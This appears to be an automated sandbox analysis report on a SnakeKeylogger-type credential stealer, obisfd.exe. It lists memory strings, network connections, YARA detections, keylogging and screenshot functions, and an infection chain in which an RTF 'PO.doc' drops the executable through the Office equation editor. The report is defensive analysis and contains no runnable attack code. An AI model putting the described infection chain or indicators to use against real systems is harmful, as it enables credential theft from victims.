                Source: obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: obisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002897000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: obisfd.exe, 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: obisfd.exe, 00000007.00000002.923787570.0000000002854000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.33
                Source: obisfd.exe, 00000007.00000002.923787570.00000000028E7000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.00000000028F6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000293B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000295B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002897000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002904000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.000000000294D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.334
                Source: obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
                Source: obisfd.exe, 00000007.00000002.924283093.000000000382B000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A47000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A75000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003877000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A34000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: obisfd.exe, 00000007.00000002.923618528.0000000000803000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/favicon.ico
                Source: obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=net
                Source: obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j46j0l3j46j0.427j0j7&sourceid=chrome&i
                Source: obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=wmf
                Source: obisfd.exe, 00000007.00000002.923787570.0000000002A88000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index
                Source: obisfd.exe, 00000007.00000002.924283093.00000000038B8000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dtest%26oq%3Dtest%26a
                Source: obisfd.exe, 00000007.00000002.924283093.00000000038B8000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003902000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/index?continue=https://www.google.com/search%3Fq%3Dwmf%2B5.1%26oq%3Dwmf
                Source: obisfd.exe, 00000007.00000002.924283093.000000000398E000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.000000000396C000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.0000000003912000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.00000000038DA000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.00000000039C6000.00000004.00000800.00020000.00000000.sdmp, obisfd.exe, 00000007.00000002.924283093.00000000038B8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/sorry/indextest
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49178
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49166
                Source: unknownNetwork traffic detected: HTTP traffic on port 49180 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49176
                Source: unknownNetwork traffic detected: HTTP traffic on port 49181 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49174
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49181
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49180
                Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49176 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49166 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49174 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49178 -> 443
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.22:49181 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to capture screen (.Net source)
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, COVID19.cs.Net Code: TakeScreenshot
                Contains functionality to log keystrokes (.Net Source)
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, COVID19.cs.Net Code: VKCodeToUnicode

                System Summary

                barindex
                Initial sample is an obfuscated RTF file
                Source: initial sampleStatic file information: Filename: PO.doc
                Malicious sample detected (through community Yara rule)
                Source: PO.doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
                Source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.obisfd.exe.39dd5c0.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.obisfd.exe.3a205e0.5.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 7.2.obisfd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.obisfd.exe.3a205e0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 5.2.obisfd.exe.39dd5c0.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000007.00000002.923446172.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.407054071.00000000037B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000005.00000002.407054071.00000000039DD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: obisfd.exe PID: 3544, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: obisfd.exe PID: 3628, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Office equation editor drops PE file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\6FfzLi8FyhIIqWu[1].exeJump to dropped file
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\obisfd.exeJump to dropped file
                Source: C:\Users\user\AppData\Roaming\obisfd.exeProcess Stats: CPU usage > 49%
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002C04C05_2_002C04C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002C11115_2_002C1111
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002CD1B05_2_002CD1B0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002CC3205_2_002CC320
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002CD7095_2_002CD709
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002CD7185_2_002CD718
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002CC7585_2_002CC758
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002CBEE85_2_002CBEE8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 5_2_002CBEC95_2_002CBEC9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030E8A87_2_0030E8A8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003040F87_2_003040F8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003081007_2_00308100
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030390C7_2_0030390C
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003049687_2_00304968
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003031B17_2_003031B1
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003069B87_2_003069B8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00309A4A7_2_00309A4A
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003043C87_2_003043C8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00304C387_2_00304C38
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003074907_2_00307490
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003034827_2_00303482
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00305D007_2_00305D00
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030DD507_2_0030DD50
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00303E287_2_00303E28
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003046997_2_00304699
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_00308EC27_2_00308EC2
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_003087E07_2_003087E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030D1F97_2_0030D1F9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030F1D97_2_0030F1D9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030D2B77_2_0030D2B7
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030FB087_2_0030FB08
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030ED407_2_0030ED40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030DD417_2_0030DD41
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030D5B87_2_0030D5B8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030D5C87_2_0030D5C8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_0030F6707_2_0030F670
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E00407_2_004E0040
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E64407_2_004E6440
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E1C607_2_004E1C60
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E80607_2_004E8060
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E2C007_2_004E2C00
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E90007_2_004E9000
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E48207_2_004E4820
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E0CC07_2_004E0CC0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E70C07_2_004E70C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E28E07_2_004E28E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E8CE07_2_004E8CE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E38807_2_004E3880
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E54A07_2_004E54A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E19407_2_004E1940
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E7D407_2_004E7D40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E35607_2_004E3560
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E45007_2_004E4500
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E61127_2_004E6112
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E61207_2_004E6120
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E25C07_2_004E25C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E89C07_2_004E89C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E41E07_2_004E41E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E51807_2_004E5180
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E09907_2_004E0990
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E09A07_2_004E09A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E6DA07_2_004E6DA0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E32407_2_004E3240
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E4E607_2_004E4E60
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E5E007_2_004E5E00
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E16207_2_004E1620
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E7A207_2_004E7A20
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E3EC07_2_004E3EC0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E5AE07_2_004E5AE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E06807_2_004E0680
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E6A807_2_004E6A80
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E22A07_2_004E22A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E86A07_2_004E86A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E4B407_2_004E4B40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E03607_2_004E0360
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E67607_2_004E6760
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E13007_2_004E1300
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E77007_2_004E7700
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E2F207_2_004E2F20
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E57C07_2_004E57C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E0FE07_2_004E0FE0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E73E07_2_004E73E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E1F807_2_004E1F80
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E83807_2_004E8380
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E3BA07_2_004E3BA0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004E57B07_2_004E57B0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F82B07_2_004F82B0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F95D07_2_004F95D0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F00407_2_004F0040
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F6E407_2_004F6E40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F8C407_2_004F8C40
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F40407_2_004F4040
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F40507_2_004F4050
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FE2507_2_004FE250
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F20687_2_004F2068
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FCA687_2_004FCA68
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F60687_2_004F6068
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F60787_2_004F6078
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FB2747_2_004FB274
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F4E097_2_004F4E09
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F0E087_2_004F0E08
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F7C087_2_004F7C08
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F4E187_2_004F4E18
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FA4187_2_004FA418
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FBC107_2_004FBC10
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FA4287_2_004FA428
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FFA287_2_004FFA28
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FE23F7_2_004FE23F
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FFA387_2_004FFA38
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F6E327_2_004F6E32
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F8C317_2_004F8C31
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F2E307_2_004F2E30
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F72C97_2_004F72C9
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F32C87_2_004F32C8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FD8C07_2_004FD8C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F04D87_2_004F04D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F72D87_2_004F72D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FC0D87_2_004FC0D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F44D87_2_004F44D8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F44E87_2_004F44E8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FA8E07_2_004FA8E0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F90FC7_2_004F90FC
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FA8F07_2_004FA8F0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F9A8C7_2_004F9A8C
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FB2807_2_004FB280
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F9A987_2_004F9A98
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FF0987_2_004FF098
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FD8AF7_2_004FD8AF
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FF0A87_2_004FF0A8
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F52A17_2_004F52A1
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F12A07_2_004F12A0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F52B07_2_004F52B0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F9F4F7_2_004F9F4F
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F57487_2_004F5748
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FB7487_2_004FB748
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F37517_2_004F3751
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F87677_2_004F8767
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F37607_2_004F3760
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F9F607_2_004F9F60
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F09607_2_004F0960
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F77607_2_004F7760
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F87787_2_004F8778
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FDD787_2_004FDD78
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F09707_2_004F0970
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F77707_2_004F7770
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FF5707_2_004FF570
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F49707_2_004F4970
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FE70A7_2_004FE70A
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F91087_2_004F9108
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F25007_2_004F2500
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F65007_2_004F6500
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FE7187_2_004FE718
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F65107_2_004F6510
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FCF207_2_004FCF20
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F57397_2_004F5739
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F17387_2_004F1738
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FB7377_2_004FB737
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FCF307_2_004FCF30
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004FEBCF7_2_004FEBCF
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F95C07_2_004F95C0
                Source: C:\Users\user\AppData\Roaming\obisfd.exeCode function: 7_2_004F1BD07_2_004F1BD0
